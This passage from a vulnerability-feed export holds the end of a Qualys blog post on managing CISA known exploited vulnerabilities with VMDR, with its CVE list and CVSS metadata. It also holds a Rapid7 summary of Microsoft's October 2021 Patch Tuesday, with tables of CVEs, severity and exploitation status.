cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-10-20T09:06:39", "description": "\n\nToday\u2019s Patch Tuesday sees Microsoft [issuing fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>) for over 70 CVEs, affecting the usual mix of their product lines. From Windows, Edge, and Office, to Exchange, SharePoint, and Dynamics, there is plenty of patching to do for workstation and server administrators alike.\n\nOne vulnerability has already been seen exploited in the wild: [CVE-2021-40449](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40449>) is an elevation of privilege vulnerability in all supported versions of Windows, including the newly released Windows 11. Rated as Important, this is likely being used alongside Remote Code Execution (RCE) and/or social engineering attacks to gain more complete control of targeted systems.\n\nThree CVEs were publicly disclosed before today, though haven\u2019t yet been observed in active exploitation. [CVE-2021-40469](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40469>) is an RCE vulnerability affecting Microsoft DNS servers, [CVE-2021-41335](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41335>) is another privilege escalation vulnerability in the Windows Kernel, and [CVE-2021-41338](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41338>) is a flaw in Windows AppContainer allowing attackers to bypass firewall rules.\n\nAttackers will likely be paying attention to the latest Windows Print Spooler vulnerability \u2013 [CVE-2021-36970](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36970>) is a Spoofing vulnerability with a CVSSv3 score of 8.8 that we don\u2019t yet have much more information about. Also worth noting is [CVE-2021-40486](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40486>), an RCE affecting Microsoft Word, OWA, as well as SharePoint Server, which can be exploited via the Preview Pane. [CVE-2021-40487](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40487>) is another RCE affecting SharePoint Server that Microsoft expects to be exploited before too long.\n\nAnother notable vulnerability is [CVE-2021-26427](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26427>), the latest in Exchange Server RCEs. The severity is mitigated by the fact that attacks are limited to a \u201clogically adjacent topology,\u201d meaning that it cannot be exploited directly over the public Internet. Three other vulnerabilities related to Exchange Server were also patched: [CVE-2021-41350](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41350>), a Spoofing vulnerability; [CVE-2021-41348](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41348>), allowing elevation of privilege; and [CVE-2021-34453](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34453>), which is a Denial of Service vulnerability.\n\nFinally, virtualization administrators should be aware of two RCEs affecting Windows Hyper-V: [CVE-2021-40461](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40461>) and [CVE-2021-38672](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38672>). Both affect relatively new versions of Windows and are considered Critical, allowing a VM to escape from guest to host by triggering a memory allocation error, allowing it to read kernel memory in the host.\n\n## Summary Charts\n\n\n\n## Summary Tables\n\n### Apps Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-41363](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41363>) | Intune Management Extension Security Feature Bypass Vulnerability | No | No | 4.2 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-37980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37980>) | Chromium: CVE-2021-37980 Inappropriate implementation in Sandbox | No | No | N/A | Yes \n[CVE-2021-37979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37979>) | Chromium: CVE-2021-37979 Heap buffer overflow in WebRTC | No | No | N/A | Yes \n[CVE-2021-37978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37978>) | Chromium: CVE-2021-37978 Heap buffer overflow in Blink | No | No | N/A | Yes \n[CVE-2021-37977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37977>) | Chromium: CVE-2021-37977 Use after free in Garbage Collection | No | No | N/A | Yes \n[CVE-2021-37976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37976>) | Chromium: CVE-2021-37976 Information leak in core | No | No | N/A | Yes \n[CVE-2021-37975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37975>) | Chromium: CVE-2021-37975 Use after free in V8 | No | No | N/A | Yes \n[CVE-2021-37974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-37974>) | Chromium: CVE-2021-37974 Use after free in Safe Browsing | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-3450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-3450>) | OpenSSL: CVE-2021-3450 CA certificate check bypass with X509_V_FLAG_X509_STRICT | No | No | N/A | Yes \n[CVE-2021-3449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-3449>) | OpenSSL: CVE-2021-3449 NULL pointer deref in signature_algorithms processing | No | No | N/A | Yes \n[CVE-2020-1971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1971>) | OpenSSL: CVE-2020-1971 EDIPARTYNAME NULL pointer de-reference | No | No | N/A | Yes \n[CVE-2021-41355](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41355>) | .NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5.7 | Yes \n \n### ESU Windows Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-38663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38663>) | Windows exFAT File System Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-40465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40465>) | Windows Text Shaping Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-36953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36953>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-40460](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40460>) | Windows Remote Procedure Call Runtime Security Feature Bypass Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-36970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36970>) | Windows Print Spooler Spoofing Vulnerability | No | No | 8.8 | No \n[CVE-2021-41332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41332>) | Windows Print Spooler Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-41331](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41331>) | Windows Media Audio Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-41342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41342>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-41335](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41335>) | Windows Kernel Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-40455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40455>) | Windows Installer Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-26442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26442>) | Windows HTTP.sys Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-41340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41340>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38662>) | Windows Fast FAT File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-41343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41343>) | Windows Fast FAT File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-40469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40469>) | Windows DNS Server Remote Code Execution Vulnerability | No | Yes | 7.2 | Yes \n[CVE-2021-40443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40443>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40466>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40467](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40467>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40449>) | Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-40489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40489>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Exchange Server Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-41350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41350>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-26427](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26427>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2021-41348](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41348>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-34453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34453>) | Microsoft Exchange Server Denial of Service Vulnerability | No | No | 7.5 | No \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40457>) | Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | No | No | 7.4 | Yes \n[CVE-2021-41353](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41353>) | Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | No | No | 5.4 | No \n[CVE-2021-41354](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41354>) | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | 4.1 | No \n \n### Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40486>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40484>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-40483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40483>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-41344](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41344>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | No \n[CVE-2021-40487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40487>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-40482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40482>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-40480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40480>) | Microsoft Office Visio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40481>) | Microsoft Office Visio Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-40471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40471>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40473>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40474>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40479>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40485>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40472>) | Microsoft Excel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n### Microsoft Office Windows Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40454](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40454>) | Rich Text Edit Control Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-41352](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41352>) | SCOM Information Disclosure Vulnerability | No | No | 7.5 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Title | Exploited | Publicly Disclosed? | CVSSv3 Base Score | has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-40464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40464>) | Windows Nearby Sharing Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-40463](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40463>) | Windows NAT Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-40462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40462>) | Windows Media Foundation Dolby Digital Atmos Decoders Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-41336](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41336>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-38672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38672>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8 | Yes \n[CVE-2021-40461](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40461>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-40477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40477>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41334](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41334>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-40475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40475>) | Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-40468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40468>) | Windows Bind Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-41347](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41347>) | Windows AppX Deployment Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41338](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41338>) | Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability | No | Yes | 5.5 | No 